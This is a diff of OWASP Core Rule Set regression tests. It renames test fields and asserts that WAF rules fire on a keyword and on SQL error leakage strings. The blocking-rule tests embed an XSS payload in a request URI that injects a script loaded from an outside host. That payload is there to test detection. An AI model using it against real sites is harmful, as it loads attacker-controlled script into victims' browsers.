Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 329 desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-330 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" + output: + log: + expect_ids: [944300] + - test_id: 330 desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" + output: + log: + expect_ids: [944300] diff --git a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml index 33c049be4..90685d508 100644 --- a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml +++ b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml @@ -1,92 +1,91 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "949110.yaml" description: | Test whether the inbound blocking mechanism works by testing whether rule 949110 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking rule to be triggered. +rule_id: 949110 tests: - - test_title: 949110-1 + - test_id: 1 desc: Test is basically identical to 941100-1 (XSS positive test in phase 2) but here we assert that the inbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "949110" - - test_title: 949110-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [949110] + - test_id: 2 desc: Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Referer: http://www.coreruleset.org - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "949110" - - test_title: 949110-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Referer: http://www.coreruleset.org + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [949110] + - test_id: 3 desc: Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/options" - version: "HTTP/1.1" - output: - no_log_contains: "id \"949110\"" - - test_title: 949110-4 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/options" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [949110] + - test_id: 4 desc: Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "REALLYLONGUNREALMETHOD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"949110\"" - - test_title: 949110-5 + - input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [949110] + - test_id: 5 desc: Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: " + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + match_regex: 'Inbound Anomaly Score Exceeded \(Total Score: ' diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml index b6df65d0c..cf9e40a07 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951110.yaml" - description: "Regression tests for rule 951110" +rule_id: 951110 tests: - - test_title: 951110-1 + - test_id: 1 desc: "Matching Microsoft Access SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} - output: - log_contains: "id \"951110\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} + output: + log: + expect_ids: [951110] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml index 1c9318bd6..84bc18f98 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml @@ -1,29 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951120.yaml" - description: "Regression tests for rule 951120" +rule_id: 951120 tests: - - test_title: 951120-1 + - test_id: 1 desc: "Matching Oracle SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} - - output: - log_contains: "id \"951120\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} + output: + log: + expect_ids: [951120] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml index a7c83eff3..beb26bbef 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951130.yaml" - description: "Regression tests for rule 951130" +rule_id: 951130 tests: - - test_title: 951130-1 + - test_id: 1 desc: "Matching DB2 SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} - output: - log_contains: "id \"951130\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} + output: + log: + expect_ids: [951130] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml index c55031406..25fcdcf04 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951140.yaml" - description: "Regression tests for rule 951140" +rule_id: 951140 tests: - - test_title: 951140-1 + - test_id: 1 desc: "Matching EMC SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} - output: - log_contains: "id \"951140\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} + output: + log: + expect_ids: [951140] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml index 2e02f92f5..161aaea10 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml @@ -1,28 +1,27 @@ --- meta: author: "azurit" - enabled: true - name: "951150.yaml" description: "Regression tests for rule 951150" +rule_id: 951150 tests: - - test_title: 951150-1 + - test_id: 1 desc: "Matching firebird SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} - output: - log_contains: "id \"951150\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} + output: + log: + expect_ids: [951150] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml index 088e2d36f..c92333950 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951160.yaml" - description: "Regression tests for rule 951160" +rule_id: 951160 tests: - - test_title: 951160-1 + - test_id: 1 desc: "Matching Frontbase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} - output: - log_contains: "id \"951160\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} + output: + log: + expect_ids: [951160] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml index 60ad4b95f..85bcf4ac6 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951170.yaml" - description: "Regression tests for rule 951170" +rule_id: 951170 tests: - - test_title: 951170-1 + - test_id: 1 desc: "Matching hsqldb SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} - output: - log_contains: "id \"951170\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} + output: + log: + expect_ids: [951170] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml index 7ac83ba06..57f2cdc95 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951180.yaml" - description: "Regression tests for rule 951180" +rule_id: 951180 tests: - - test_title: 951180-1 + - test_id: 1 desc: "Matching informix SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} - output: - log_contains: "id \"951180\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} + output: + log: + expect_ids: [951180] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml index b1ca7c7b1..d717ef4f3 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951190.yaml" - description: "Regression tests for rule 951190" +rule_id: 951190 tests: - - test_title: 951190-1 + - test_id: 1 desc: "Matching ingres SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} - output: - log_contains: "id \"951190\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} + output: + log: + expect_ids: [951190] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml index a190b55e2..ee8a31012 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951200.yaml" - description: "Regression tests for rule 951200" +rule_id: 951200 tests: - - test_title: 951200-1 + - test_id: 1 desc: "Matching interbase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} - output: - log_contains: "id \"951200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} + output: + log: + expect_ids: [951200] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml index f65083eb9..28239707b 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951210.yaml" - description: "Regression tests for rule 951210" +rule_id: 951210 tests: - - test_title: 951210-1 + - test_id: 1 desc: "Matching maxDB SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} - output: - log_contains: "id \"951210\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} + output: + log: + expect_ids: [951210] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml index 18d37f411..b66b43f98 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml @@ -1,50 +1,47 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951220.yaml" - description: "Regression tests for rule 951220" +rule_id: 951220 tests: - - test_title: 951220-1 + - test_id: 1 desc: "Matching mssql SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in 